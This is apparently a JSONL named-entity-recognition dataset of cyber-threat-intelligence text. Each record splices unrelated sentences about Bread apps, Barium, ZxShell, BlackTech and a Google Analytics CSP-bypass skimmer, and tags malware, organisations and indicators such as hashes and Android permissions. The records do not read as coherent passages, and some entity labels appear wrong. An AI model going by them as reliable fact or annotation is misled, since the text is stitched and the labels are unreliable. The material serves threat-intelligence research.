{"text": "Bread apps frequently contain no functionality beyond the billing process or simply clone content from other popular apps . Using the information gathered from its reconnaissance on social media sites , Barium packages the phishing e-mail in a way that gives the e-mail credibility to the target user , often by making the e-mail appear as ifit were sent from an organization known to and trusted by the victim or concerning a topic of interest to the victim . The encrypted IP address is \u201c 127.0.0.2 \u201d ( used as loopback ) and no connection is made on that IP address ( due to the listening variable set to 1 ) . Zarya \u2019s Telegram channel was created in March 2022 , although the group \u2019s alleged leader claimed that elements of Zarya existed well before this , and were previously known by various names including \u201c 0x000000 \u201d and \u201c Quarantine \u201d ( Russian : \u041a\u0430\u0440\u0430\u043d\u0442\u0438\u043d ) .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 182, "end": 194, "label": "Organization"}, {"start": 203, "end": 209, "label": "Organization"}, {"start": 491, "end": 500, "label": "Indicator"}, {"start": 614, "end": 639, "label": "Organization"}, {"start": 730, "end": 735, "label": "Organization"}, {"start": 818, "end": 826, "label": "Organization"}, {"start": 835, "end": 845, "label": "Organization"}, {"start": 850, "end": 868, "label": "Organization"}]}
{"text": "VERSIONING Bread has also leveraged an abuse tactic unique to app stores : versioning . Barium Defendants install the malicious \" Win32/Barlaiy \" malware and the malicious \" Win32/PlugX.L \" malware on victim computers using the means described above . We used the ZxShell package for version 3.10 ( SHA256 : 1622460afbc8a255141256cb77af61c670ec21291df8fe0989c37852b59422b4 ).The convenient thing about this is that the CNC panel worked with any version , 3.10 and above . Lowcode automation of processes can make the required actions fast , reliable , and repeatable .", "spans": [{"start": 11, "end": 16, "label": "Malware"}, {"start": 88, "end": 94, "label": "Organization"}, {"start": 130, "end": 143, "label": "System"}, {"start": 174, "end": 187, "label": "System"}, {"start": 264, "end": 271, "label": "Malware"}, {"start": 308, "end": 372, "label": "Indicator"}, {"start": 419, "end": 428, "label": "System"}]}
{"text": "Some apps have started with clean versions , in an attempt to grow user bases and build the developer accounts \u2019 reputations . Both Win32/Barlaiy & Win32/PlugX.L are remote access \" trojans \" , which allow Barium to gather a victim 's information , control a victim 's device , install additional malware , and exfiltrate information fi-om a victim 's device . The buttons are all in Chinese , with the help of Google Translate and keen detective skills ( read : button clicking ) , we \u2019ve deciphered the functionality . These group policies contained instructions to copy a file from a server to the local hard drive and to schedule a task to run the copied file at a particular time .", "spans": [{"start": 132, "end": 145, "label": "System"}, {"start": 148, "end": 161, "label": "System"}, {"start": 206, "end": 212, "label": "Organization"}, {"start": 411, "end": 427, "label": "System"}]}
{"text": "Only later is the malicious code introduced , through an update . Barium Defendants install the malicious credential stealing and injection tool known as \" Win32/RibDoor.A!dha \" . Once an infected machine connects , you see its information displayed in a selection box at the top . An attacker could exploit these issues by tricking a user into opening a specially crafted PDF document or , if the user has the browser extension enabled , by visiting a malicious web page :", "spans": [{"start": 66, "end": 72, "label": "Organization"}, {"start": 156, "end": 175, "label": "System"}, {"start": 285, "end": 293, "label": "Organization"}]}
{"text": "Interestingly , early \u201c clean \u201d versions contain varying levels of signals that the updates will include malicious code later . While not detected at the time , Microsoft 's antivirus and security products now detect this Barium malicious file and flag the file as \" Win32/ShadowPad.A \" . There are some built in functions on the side for the more common features . The sample of LIGHTWORK we obtained includes eight hardcoded IEC-104 information object addresses ( IOA ) , which typically correlate with input or output data elements on a device and may correspond to power line switches or circuit breakers in an RTU or relay configuration .", "spans": [{"start": 161, "end": 170, "label": "Organization"}, {"start": 222, "end": 228, "label": "Organization"}, {"start": 267, "end": 284, "label": "Malware"}, {"start": 380, "end": 389, "label": "System"}, {"start": 411, "end": 641, "label": "Indicator"}]}
{"text": "Some are first uploaded with all the necessary code except the one line that actually initializes the billing process . MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com.mxi.videoplay ) . These include remote desktop , webcam spying , remote shell , and file management . By the end of 2022 , Cuba ransomware threat actors had compromised over 100 organizations worldwide .", "spans": [{"start": 120, "end": 130, "label": "Malware"}, {"start": 190, "end": 212, "label": "Malware"}, {"start": 217, "end": 242, "label": "Malware"}, {"start": 387, "end": 416, "label": "Organization"}]}
{"text": "Others may have the necessary permissions , but are missing the classes containing the fraud code . Figure 9a , below , shows detections of encounters with the Barium actors and their infrastructure , including infected computers located in Virginia , and Figure 9b , below , shows detections of encounters throughout the United States . You can also select a host and type help for a full list of commands . \u2022 Identify and investigate the creation , transfer , and/or execution of unauthorized Python - packaged executables ( e.g. , PyInstaller or Py2Exe ) on OT systems or systems with access to OT resources .", "spans": [{"start": 534, "end": 545, "label": "System"}, {"start": 549, "end": 555, "label": "System"}, {"start": 561, "end": 571, "label": "System"}, {"start": 575, "end": 610, "label": "System"}]}
{"text": "And others have all malicious content removed , except for log comments referencing the payment process . Barium has targeted Microsoft customers both in Virginia , the United States , and around the world . I have the same machine infected with two different version of ZxShell . As opposed to the PowerPoint documents that did not display any slides in our testing environments , all Excel documents display legitimate - looking documents related to the targeted military organizations , or generic descriptions on how to enable VBA macro functionality in Excel .", "spans": [{"start": 106, "end": 112, "label": "Organization"}, {"start": 126, "end": 145, "label": "Organization"}, {"start": 271, "end": 278, "label": "Malware"}, {"start": 531, "end": 540, "label": "System"}]}
{"text": "All of these methods attempt to space out the introduction of possible signals in various stages , testing for gaps in the publication process . Once the Barium Defendants have access to a victim computer through the malware described above , they monitor the victim 's activity and ultimately search for and steal sensitive documents ( for example , exfiltration of intellectual property regarding technology has been seen ) , and personal information fi\"om the victim 's network . Sending the help command for each , you can see the extra features added between version 3.1 and 3.2 . The \u201c ExecStart \u201d value specifies the path of the program to be run , which in this case was GOGETTER .", "spans": [{"start": 399, "end": 409, "label": "Organization"}, {"start": 679, "end": 687, "label": "System"}]}
{"text": "However , GPP does not treat new apps and updates any differently from an analysis perspective . According to a 49-page report published Thursday , all of the attacks are the work of Chinese government 's intelligence apparatus , which the report 's authors dub the Winnti Umbrella . Keylogging , ZXARPS ( IP and URL spoofing ) , and SYNFlood are some of the interesting features added to version 3.2 . The content of the form is legitimate and targets Ukrainian government organizations , as seen in the image below .", "spans": [{"start": 266, "end": 281, "label": "Organization"}, {"start": 297, "end": 303, "label": "Malware"}, {"start": 453, "end": 487, "label": "Organization"}]}
{"text": "FAKE REVIEWS When early versions of apps are first published , many five star reviews appear with comments like : \u201c So .. good .. \u201d \u201c very beautiful \u201d Later , 1 star reviews from real users start appearing with comments like : \u201c Deception \u201d \u201c The app is not honest \u2026 \u201d SUMMARY Sheer volume appears to be the preferred approach for Bread developers . Researchers from various security organizations have used a variety of names to assign responsibility for the hacks , including LEAD , BARIUM , Wicked Panda , GREF , PassCV , Axiom , and Winnti . In versions 3.1 \u2013 3.21, the configuration info is xor encoded with 0x85 . Most fraudsters create one - time email addresses or use stolen email addresses , both of which are easy to create or obtain .", "spans": [{"start": 331, "end": 336, "label": "Malware"}, {"start": 478, "end": 482, "label": "Organization"}, {"start": 485, "end": 491, "label": "Organization"}, {"start": 494, "end": 506, "label": "Organization"}, {"start": 509, "end": 513, "label": "Organization"}, {"start": 516, "end": 522, "label": "Organization"}, {"start": 525, "end": 530, "label": "Organization"}, {"start": 537, "end": 543, "label": "Organization"}, {"start": 625, "end": 635, "label": "Organization"}]}
{"text": "At different times , we have seen three or more active variants using different approaches or targeting different carriers . It targets organizations in Japan , South Korea , and Taiwan , leveling its attacks on public sector agencies and telecommunications and other high-technology industries . This configuration info can be changed with a tool included in the ZxShell package . TANKTRAP is a utility written in PowerShell that utilizes Windows group policy to spread and launch a wiper .", "spans": [{"start": 212, "end": 234, "label": "Organization"}, {"start": 239, "end": 257, "label": "Organization"}, {"start": 268, "end": 294, "label": "Organization"}, {"start": 364, "end": 371, "label": "Malware"}, {"start": 382, "end": 390, "label": "Malware"}, {"start": 404, "end": 489, "label": "Malware"}]}
{"text": "Within each variant , the malicious code present in each sample may look nearly identical with only one evasion technique changed . In 2016 , for instance , we found their campaigns attacking Japanese organizations with various malware tools , notably the Elirks backdoor . In versions 3.22 and 3.39 the routine changes . None Organizations should apply the November 8 , 2022 patches for Exchange to prevent exploitation since the URL rewrite mitigations for ProxyNotShell are not effective against this exploit method .", "spans": [{"start": 256, "end": 271, "label": "System"}, {"start": 459, "end": 472, "label": "Vulnerability"}]}
{"text": "Sample 1 may use AES-encrypted strings with reflection , while Sample 2 ( submitted on the same day ) will use the same code but with plaintext strings . Blackgear has been targeting various industries since its emergence a decade ago . The new xor encoding byte is 0x5B . As well as SysUpdate , the attackers used a number of legitimate or publicly available tools to map the network and dump credentials .", "spans": [{"start": 17, "end": 30, "label": "Organization"}, {"start": 284, "end": 293, "label": "Malware"}, {"start": 300, "end": 309, "label": "Organization"}, {"start": 327, "end": 365, "label": "System"}]}
{"text": "At peak times of activity , we have seen up to 23 different apps from this family submitted to Play in one day . Blackgear 's campaigns also use email as an entry point , which is why it's important to secure the email gateway . The data is stored in the last 0x100 bytes of the file . Next , it sends a \u201c C_SC_NA_1 \u2013 single command \u201d to each hardcoded IOA to modify the state of the target station \u2019s IOA ( OFF or ON ) .", "spans": [{"start": 95, "end": 99, "label": "System"}]}
{"text": "At other times , Bread appears to abandon hope of making a variant successful and we see a gap of a week or longer before the next variant . BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years . The first 8 bytes of data are static . On June 27 , 2023 , at 18:51:57 UTC , Mandiant identified a malicious Ruby script executed via the JumpCloud agent at a downstream customer ( a software solutions entity ) .", "spans": [{"start": 17, "end": 22, "label": "Malware"}, {"start": 195, "end": 200, "label": "Organization"}, {"start": 327, "end": 348, "label": "Malware"}, {"start": 366, "end": 381, "label": "Organization"}, {"start": 387, "end": 406, "label": "Organization"}, {"start": 411, "end": 436, "label": "Organization"}]}
{"text": "This family showcases the amount of resources that malware authors now have to expend . Our research indicates that it has started targeting Japanese users . Then there is the dll install name , the domain , and the port . Talos discovered multiple vulnerabilities in Foxit PDF Reader that could allow an adversary to execute , arbitrary code on the targeted machine .", "spans": [{"start": 141, "end": 155, "label": "Organization"}, {"start": 176, "end": 179, "label": "System"}, {"start": 223, "end": 228, "label": "Organization"}, {"start": 268, "end": 284, "label": "System"}]}
{"text": "Google Play Protect is constantly updating detection engines and warning users of malicious apps installed on their device . The malware tools used by BLACKGEAR can be categorized into three categories : binders , downloaders and backdoors . Knowing the obfuscation routines for this data we wrote a script to extract the URLs / IPs and ports stored . \u2022 Unauthorized network connections to MSSQL servers ( TCP/1433 ) and irregular or unauthorized authentication .", "spans": [{"start": 0, "end": 19, "label": "System"}, {"start": 204, "end": 211, "label": "System"}, {"start": 214, "end": 225, "label": "System"}, {"start": 230, "end": 239, "label": "System"}, {"start": 354, "end": 461, "label": "Indicator"}]}
{"text": "SELECTED SAMPLES Package Name SHA-256 Digest com.rabbit.artcamera 18c277c7953983f45f2fe6ab4c7d872b2794c256604e43500045cb2b2084103f org.horoscope.astrology.predict 6f1a1dbeb5b28c80ddc51b77a83c7a27b045309c4f1bff48aaff7d79dfd4eb26 com.theforest.rotatemarswallpaper 4e78a26832a0d471922eb61231bc498463337fed8874db5f70b17dd06dcb9f09 Binders are delivered by attack vectors ( such as phishing and watering hole attacks ) onto a machine . The most common ports used are , 80, 1985, 1986, and 443 . 1985 is the default port for the malware , 1986 is the lazy variation of that port . For this year 's State of Malware report we asked : What do resource constrained organizations need to know in 2023 ?", "spans": [{"start": 45, "end": 65, "label": "Indicator"}, {"start": 66, "end": 130, "label": "Indicator"}, {"start": 131, "end": 162, "label": "Indicator"}, {"start": 163, "end": 227, "label": "Indicator"}, {"start": 228, "end": 261, "label": "Indicator"}, {"start": 262, "end": 326, "label": "Indicator"}, {"start": 327, "end": 334, "label": "System"}, {"start": 656, "end": 669, "label": "Organization"}]}
{"text": "com.jspany.temp 0ce78efa764ce1e7fb92c4de351ec1113f3e2ca4b2932feef46d7d62d6ae87f5 com.hua.ru.quan 780936deb27be5dceea20a5489014236796a74cc967a12e36cb56d9b8df9bc86 com.rongnea.udonood 8b2271938c524dd1064e74717b82e48b778e49e26b5ac2dae8856555b5489131 Based on the mutexes and domain names of some of their C&C servers , BlackTech 's campaigns are likely designed to steal their target 's technology . Port 80 and 443 are the default ports for HTTP and HTTPS traffic . It crafts configurable IEC-104 Application Service Data Unit ( ASDU ) messages , to change the state of RTU Information Object Addresses ( IOAs ) to ON or OFF .", "spans": [{"start": 0, "end": 15, "label": "Indicator"}, {"start": 16, "end": 80, "label": "Indicator"}, {"start": 81, "end": 96, "label": "Indicator"}, {"start": 97, "end": 161, "label": "Indicator"}, {"start": 162, "end": 181, "label": "Indicator"}, {"start": 182, "end": 246, "label": "Indicator"}, {"start": 439, "end": 443, "label": "Indicator"}, {"start": 448, "end": 453, "label": "Indicator"}]}
{"text": "com.mbv.a.wp 01611e16f573da2c9dbc7acdd445d84bae71fecf2927753e341d8a5652b89a68 com.pho.nec.sg b4822eeb71c83e4aab5ddfecfb58459e5c5e10d382a2364da1c42621f58e119b Exobot ( Marcher ) - Android banking Trojan on the rise February 2017 Introduction The past months many different banking Trojans for Following their activities and evolving tactics and techniques helped us uncover the proverbial red string of fate that connected three seemingly disparate campaigns : PLEAD , Shrouded Crossbow , and of late , Waterbear . The next most common is port 53 . The operation and the key are different throughout the strings so , the best option is to emulate this part to get the decoded strings .", "spans": [{"start": 0, "end": 12, "label": "Indicator"}, {"start": 13, "end": 77, "label": "Indicator"}, {"start": 78, "end": 92, "label": "Indicator"}, {"start": 93, "end": 157, "label": "Indicator"}, {"start": 158, "end": 164, "label": "Malware"}, {"start": 167, "end": 174, "label": "Malware"}, {"start": 179, "end": 186, "label": "System"}, {"start": 548, "end": 610, "label": "Malware"}]}
{"text": "the Android platform have received media attention . Active since 2012 , it has so far targeted Taiwanese government agencies and private organizations . This is used in some of the newer 3.22 and 3.39 samples . In addition , more ransomware gangs are attacking targets multiple times a month : the number of groups carrying out more than one known attack per month in the UK has climbed steadily for a year , from just one in July 2022 to eight in June 2023 .", "spans": [{"start": 4, "end": 11, "label": "System"}, {"start": 106, "end": 125, "label": "Organization"}, {"start": 231, "end": 247, "label": "Organization"}, {"start": 270, "end": 292, "label": "Indicator"}, {"start": 316, "end": 365, "label": "Indicator"}, {"start": 424, "end": 458, "label": "Indicator"}]}
{"text": "One of these , called Marcher ( aka Exobot ) , seems to be especially active with different samples appearing on a daily basis . PLEAD uses spear-phishing emails to deliver and install their backdoor , either as an attachment or through links to cloud storage services . After that , the count for each port starts declining sharply . A clever example was \u2018 Office Monkeys LOL Video.zip \u2019 .", "spans": [{"start": 22, "end": 29, "label": "Malware"}, {"start": 36, "end": 42, "label": "Malware"}, {"start": 246, "end": 268, "label": "System"}, {"start": 358, "end": 386, "label": "Indicator"}]}
{"text": "This malware variant also appears to be technically superior to many other banking Trojans being able to use its overlay attack even on Android 6 , which has technical improvements compared to the previous Android versions to prevent such attacks . PLEAD also dabbled with a short-lived , fileless version of their malware when it obtained an exploit for a Flash vulnerability ( CVE-2015-5119 ) that was leaked during the Hacking Team breach . The choices are interesting though , many correspond to what looks like the birth year of the controller ( ie . years in the late 1980s and early 1990s ) , and others seem to match what year the malware was launched in ( ie . in the 2000s , relatively close to the current year ) . Mandiant assesses with high confidence that UNC4899 is a cryptocurrency - focused element within the DPRK 's Reconnaissance General Bureau ( RGB ) .", "spans": [{"start": 136, "end": 145, "label": "System"}, {"start": 206, "end": 213, "label": "System"}, {"start": 357, "end": 376, "label": "Vulnerability"}, {"start": 379, "end": 392, "label": "Vulnerability"}, {"start": 770, "end": 777, "label": "Organization"}]}
{"text": "The main infection vector is a phishing attack using SMS/MMS . PLEAD also uses CVE-2017-7269 , a buffer overflow vulnerability Microsoft Internet Information Services ( IIS ) 6.0 to compromise the victim 's server . Since this malware dates back to around 2004 , there are many samples containing CNC URLs from the 3322.org page . The HyperText Transfer Protocol ( HTTP ) redirect status response code indicates that the resource requested has been temporarily moved to the URL given by the header .", "spans": [{"start": 79, "end": 92, "label": "Vulnerability"}, {"start": 297, "end": 300, "label": "System"}, {"start": 315, "end": 323, "label": "Indicator"}, {"start": 331, "end": 371, "label": "System"}, {"start": 412, "end": 497, "label": "Indicator"}]}
{"text": "The social engineering message includes a link that leads to a fake version of a popular app , using names like Runtastic , WhatsApp or Netflix . This campaign , first observed in 2010 , is believed to be operated by a well-funded group given how it appeared to have purchased the source code of the BIFROST backdoor , which the operators enhanced and created other tools from . This page used to offer no-ip type hosting and was widely used by malware authors . A browser redirects to this page but search engines do n't update their links to the resource ( in ' SEO - speak ' , it is said that the ' link - juice ' is not sent to the new URL ) .", "spans": [{"start": 112, "end": 121, "label": "System"}, {"start": 124, "end": 132, "label": "System"}, {"start": 136, "end": 143, "label": "System"}, {"start": 465, "end": 472, "label": "System"}]}
{"text": "On installation , the app requests the user to provide SMS storage access and high Android privileges such as Device Admin . Shrouded Crossbow targeted privatized agencies and government contractors as well as enterprises in the consumer electronics , computer , healthcare , and financial industries . So much so that Microsoft did a takedown in 2012 . It is therefore recommended to set the code only as a response for or methods and to use instead , as the method change is explicitly prohibited in that case .", "spans": [{"start": 83, "end": 90, "label": "System"}, {"start": 152, "end": 171, "label": "Organization"}, {"start": 176, "end": 198, "label": "Organization"}, {"start": 210, "end": 221, "label": "Organization"}, {"start": 229, "end": 249, "label": "Organization"}, {"start": 252, "end": 260, "label": "Organization"}, {"start": 263, "end": 273, "label": "Organization"}, {"start": 280, "end": 300, "label": "Organization"}, {"start": 319, "end": 328, "label": "Organization"}]}
{"text": "Other infection vectors include pornographic websites serving apps called Adobe Flash or YouPorn . Shrouded Crossbow employs three BIFROST-derived backdoors : BIFROSE , KIVARS , and XBOW . A similar service , vicp.net , is also seen in many of the domains . CSP can define a list of domains that the browser should be allowed to interact with for the visited URL .", "spans": [{"start": 74, "end": 85, "label": "System"}, {"start": 89, "end": 96, "label": "System"}, {"start": 131, "end": 156, "label": "System"}, {"start": 159, "end": 166, "label": "System"}, {"start": 169, "end": 175, "label": "System"}, {"start": 182, "end": 186, "label": "System"}, {"start": 209, "end": 217, "label": "Indicator"}, {"start": 258, "end": 261, "label": "Organization"}, {"start": 300, "end": 307, "label": "System"}, {"start": 359, "end": 362, "label": "System"}]}
{"text": "The Marcher banking malware uses two main attack vectors . Like PLEAD , Shrouded Crossbow uses spear-phishing emails with backdoor-laden attachments that utilize the RTLO technique and accompanied by decoy documents . In the malware , if a domain is configured , it will retrieve domain.tld / . Designed to guard against XSS attacks , CSP helps control which domains can be accessed as part of a page and therefore restricts which domains to share data with .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 166, "end": 180, "label": "System"}, {"start": 200, "end": 215, "label": "Malware"}, {"start": 280, "end": 290, "label": "Indicator"}, {"start": 321, "end": 332, "label": "Organization"}, {"start": 335, "end": 338, "label": "Organization"}]}
{"text": "The first attack vector is to compromise the out of band authentication for online banks that rely on SMS using SMS forwarding . XBOW 's capabilities are derived from BIFROSE and KIVARS ; Shrouded Crossbow gets its name from its unique mutex format . txt . These restrictions are specified by a list of allowed URIs .", "spans": [{"start": 129, "end": 133, "label": "System"}, {"start": 167, "end": 174, "label": "System"}, {"start": 179, "end": 185, "label": "System"}, {"start": 251, "end": 254, "label": "Indicator"}, {"start": 303, "end": 315, "label": "System"}]}
{"text": "The second attack vector , the overlay attack , shows a customized phishing window whenever a targeted application is started on the device . While PLEAD and KIVARS are most likely to be used in first phase attacks , Waterbear can be seen as a secondary backdoor installed after attackers have gained a certain level of privilege . This file contains a list of IP addresses for the infected machine to connect back to . By analyzing field data we see a gap in the implementation of CSP , and even for sites that do use it correctly , this creates an open window to exfiltrate data .", "spans": [{"start": 148, "end": 153, "label": "System"}, {"start": 158, "end": 164, "label": "System"}, {"start": 451, "end": 531, "label": "Vulnerability"}]}
{"text": "The overlay window is often indistinguishable from the expected screen ( such as a login screen for a banking app ) and is used to steal the victim \u2019 s banking credentials . Recently , the JPCERT published a thorough analysis of the Plead backdoor , which , according to Trend Micro , is used by the cyberespionage group BlackTech . Otherwise , if an IP address is configured , it will connect directly to that IP address . Our demonstration shows how using the Google Analytics API , a web skimmer can send data to be collected in his own account instance .", "spans": [{"start": 189, "end": 195, "label": "Organization"}, {"start": 233, "end": 247, "label": "System"}, {"start": 271, "end": 282, "label": "Organization"}, {"start": 462, "end": 482, "label": "System"}, {"start": 485, "end": 498, "label": "Organization"}]}
{"text": "The target list and bank specific fake login pages can be dynamically updated via their C2 panel ( dashboard back-end ) which significantly increases the adaptability and scalability of this attack . Despite the fact that the Changing Information Technology Inc. certificate was revoked on July 4 , 2017 , the BlackTech group is still using it to sign their malicious tools . We have written a simple C++ ZxShell Server that implements the communication and the handshake for the version 3.10 and 3.20 of the ZxShell DLL . As Google Analytics is allowed in the CSP configuration of many major sites , this demo shows how an attacker can bypass this security protection and steal data .", "spans": [{"start": 405, "end": 412, "label": "Malware"}, {"start": 509, "end": 516, "label": "Malware"}, {"start": 517, "end": 520, "label": "System"}, {"start": 526, "end": 542, "label": "Organization"}, {"start": 561, "end": 564, "label": "Organization"}, {"start": 624, "end": 632, "label": "Organization"}]}
{"text": "In addition , this type of Android banking malware does not require the device to be rooted or the app to have any specific Android permission ( besides android.permission.INTERNET to retrieve the overlay contents and send its captured data ) . The BlackTech group is primarily focused on cyberespionage in Asia . The implementation is quite simple : After the handshake , 2 threads that deal with data transfer are spawned . Our gathered field data shows the following statistics on CSP usage across the Internet ( based on HTTPArchive March 2020 scan ):", "spans": [{"start": 27, "end": 34, "label": "System"}, {"start": 124, "end": 131, "label": "System"}, {"start": 153, "end": 180, "label": "Indicator"}, {"start": 484, "end": 487, "label": "Organization"}]}
{"text": "The many changes we see in the way the attacks are performed show that attackers are heavily experimenting to find the best way of infecting a mobile device and abusing existing functionality to perform successful phishing attacks . The new activity described in this blogpost was detected by ESET in Taiwan , where the Plead malware has always been most actively deployed . Advanced persistent threats will remain a problem for companies and organizations of all sizes , especially those with high financial or intellectual property value . We took google - analytics as an example , but other services can also be used .", "spans": [{"start": 293, "end": 297, "label": "Organization"}, {"start": 320, "end": 333, "label": "System"}, {"start": 550, "end": 568, "label": "System"}]}
{"text": "The next stage in device infection could be the use of exploit kits and malvertising , which would be quite effective due the many Android vulnerabilities and consumers with unpatched devices . Attackers are targeting Windows platform and aiming at government institutions as well as big companies in Colombia . Group 72 \u2019s involvement in Operation SMN is another example of what sort of damage that can be done if organizations are not diligent in their efforts to secure their networks . As an example , we took the twitter login page , which implemented the following CSP rule ( which contains ): The following short JS code inserted into the site will send the credentials to google - analytics console controlled by us : The UA-#######- # parameter is the tag ID owner that Google Analytics uses to connect the data to a specific account .", "spans": [{"start": 131, "end": 154, "label": "Vulnerability"}, {"start": 174, "end": 191, "label": "Vulnerability"}, {"start": 249, "end": 272, "label": "Organization"}, {"start": 312, "end": 320, "label": "Organization"}, {"start": 518, "end": 525, "label": "System"}, {"start": 571, "end": 574, "label": "Organization"}]}
{"text": "In addition future Trojans could leverage root exploits to make them almost impossible to remove and give malicious actors the ability to hook generic low level API \u2019 s that are used by all ( banking ) applications , just like the attack vector as has been used on the desktop platform for years . Attackers like to use spear-fishing email with password protected RAR attachment to avoid being detected by the email gateway . ZxShell is one sample amongst several tools that Group 72 used within their campaign . Though Google meant to have this parameter be used to mention the page the user visited , we used it to exfiltrate the user name and password data encoded in base64 .", "spans": [{"start": 364, "end": 367, "label": "System"}, {"start": 426, "end": 433, "label": "Malware"}, {"start": 475, "end": 483, "label": "Organization"}]}
{"text": "Technical Analysis Permissions Marcher \u2019 s APK size is fairly small ( only 683KB for sample eb8f02fc30ec49e4af1560e54b53d1a7 ) , much smaller than most legitimate apps and other popular mobile malware samples . The first sample being captured was in April 2018 and since that we observed a lot more related ones . ZxShell is a sophisticated tool employed by Group 72 that contains all kinds of functionality . In our Google Analytics platform , we will see the data as : In our demo the DP will result in page view of Which will be decoded from base64 as : The source of the problem is that the CSP rule system is n\u2019t granular enough .", "spans": [{"start": 31, "end": 38, "label": "Malware"}, {"start": 92, "end": 124, "label": "Indicator"}, {"start": 314, "end": 321, "label": "Malware"}, {"start": 358, "end": 366, "label": "Organization"}, {"start": 417, "end": 442, "label": "System"}, {"start": 532, "end": 551, "label": "Indicator"}, {"start": 595, "end": 598, "label": "Organization"}]}
{"text": "This sample only includes Dalvik bytecode and resources without any native libraries . After performing investigations on the classified victims , we find the attacker targets big companies and government agencies in Colombia . Its detection and removal can be difficult due to the various techniques used to conceal its presence , such as disabling the host anti-virus , masking its installation on a system with a valid service name , and by masking outbound traffic as originating from a web browser . Recognizing and stopping the above malicious JavaScript request requires advanced visibility solutions that can detect the access and exfiltration of sensitive user data ( in this case the user \u2019s email address and password ) .", "spans": [{"start": 194, "end": 213, "label": "Organization"}, {"start": 540, "end": 568, "label": "Malware"}]}
{"text": "The package name ( vyn.hhsdzgvoexobmkygffzwuewrbikzud ) and its many activities and services have randomized names , probably to make it a bit more difficult to detect the package using blacklisting . After monitoring and correlating the APT attack , 360 Threat Intelligence Center discovered multiple related emails to attack Colombian government agencies , financial institutions and large enterprises . While other techniques are also utilized to conceal and inhibit its removal , ZxShell \u2019s primary functionality is to act as a Remote Administration Tool ( RAT ) , allowing the threat actor to have continuous backdoor access on to the compromised machine . The problem is that CSP does n't support query strings ( See Spec ):", "spans": [{"start": 19, "end": 53, "label": "Indicator"}, {"start": 251, "end": 281, "label": "Organization"}, {"start": 337, "end": 356, "label": "Organization"}, {"start": 359, "end": 381, "label": "Organization"}, {"start": 392, "end": 403, "label": "Organization"}, {"start": 484, "end": 491, "label": "Malware"}, {"start": 532, "end": 558, "label": "System"}, {"start": 561, "end": 564, "label": "System"}, {"start": 614, "end": 622, "label": "Malware"}, {"start": 682, "end": 716, "label": "Vulnerability"}]}
{"text": "The set of permissions required by Marcher according to the manifest is as follows : \u2217 android.permission.CHANGE_NETWORK_STATE ( change network connectivity state ) \u2217 android.permission.SEND_SMS ( send SMS messages ) \u2217 android.permission.USES_POLICY_FORCE_LOCK ( lock the device ) \u2217 android.permission.RECEIVE_BOOT_COMPLETED ( start malware when device boots ) \u2217 android.permission.INTERNET ( communicate with the internet ) \u2217 android.permission.VIBRATE The oldest sample we've seen up to now is from November 2013 . As our analysis demonstrates , ZxShell is an effective tool that can be ultimately used to steal user credentials and other highly valuable information . Having such a gap with the most commonly used domain allowed with CSP is a major risk indicator of the threats that can come from other domains that are used to serve multiple accounts .", "spans": [{"start": 35, "end": 42, "label": "Malware"}, {"start": 87, "end": 126, "label": "Indicator"}, {"start": 167, "end": 194, "label": "Indicator"}, {"start": 219, "end": 260, "label": "Indicator"}, {"start": 283, "end": 324, "label": "Indicator"}, {"start": 363, "end": 390, "label": "Indicator"}, {"start": 427, "end": 453, "label": "Indicator"}, {"start": 548, "end": 555, "label": "Malware"}, {"start": 757, "end": 855, "label": "Indicator"}]}
{"text": "( control the vibrator ) \u2217 android.permission.ACCESS_WIFI_STATE ( view information about the status of Wi-Fi ) \u2217 android.permission.WRITE_SMS ( edit/delete SMS ) \u2217 android.permission.ACCESS_NETWORK_STATE ( view the status of all networks ) \u2217 android.permission.WAKE_LOCK ( prevent the phone from going to sleep ) \u2217 android.permission.GET_TASKS ( retrieve running applications ) \u2217 android.permission.CALL_PHONE ( call phone numbers ) One of the top targets is the Japan Pension Service , but the list of targeted industries includes government and government agencies , local governments , public interest groups , universities , banks , financial services , energy and so on . The threat posed by ZxShell to organizations is one that cannot be ignored . A possible solution would come from adaptive URLs , adding the ID as part of the URL or subdomain to allow admins to set CSP rules that restrict data exfiltration to other accounts .", "spans": [{"start": 27, "end": 63, "label": "Indicator"}, {"start": 113, "end": 141, "label": "Indicator"}, {"start": 164, "end": 203, "label": "Indicator"}, {"start": 242, "end": 270, "label": "Indicator"}, {"start": 315, "end": 343, "label": "Indicator"}, {"start": 380, "end": 409, "label": "Indicator"}, {"start": 469, "end": 484, "label": "Organization"}, {"start": 532, "end": 542, "label": "Organization"}, {"start": 547, "end": 566, "label": "Organization"}, {"start": 569, "end": 586, "label": "Organization"}, {"start": 589, "end": 611, "label": "Organization"}, {"start": 614, "end": 626, "label": "Organization"}, {"start": 629, "end": 634, "label": "Organization"}, {"start": 637, "end": 655, "label": "Organization"}, {"start": 658, "end": 664, "label": "Organization"}, {"start": 697, "end": 704, "label": "Malware"}]}
{"text": "\u2217 android.permission.WRITE_SETTINGS ( read/write global system settings ) \u2217 android.permission.RECEIVE_SMS ( intercept SMS messages ) \u2217 android.permission.READ_PHONE_STATE ( read phone details of the device such as phone number and serial number ) \u2217 android.permission.CHANGE_WIFI_STATE ( connect to and disconnect from Wi-Fi networks and make changes to configured networks ) \u2217 android.permission.READ_CONTACTS ( read all contact data ) * android.permission.READ_SMS However , the attack is different in two respects : unlike other APTs , the main focus of Blue Termite is to attack Japanese organizations ; and most of their C2s are located in Japan . Organizations with high financial or intellectual property value should take the time to ensure their security requirements are met and that employee \u2019s are educated about the security threats their organizations face . In addition to the complexity of managing CSP rules , this vulnerability shows how widely used services such as Google Analytics can be subverted to bypass this protection .", "spans": [{"start": 2, "end": 35, "label": "Indicator"}, {"start": 76, "end": 106, "label": "Indicator"}, {"start": 136, "end": 171, "label": "Indicator"}, {"start": 250, "end": 286, "label": "Indicator"}, {"start": 379, "end": 411, "label": "Indicator"}, {"start": 440, "end": 467, "label": "Indicator"}, {"start": 558, "end": 570, "label": "System"}, {"start": 986, "end": 1002, "label": "System"}]}
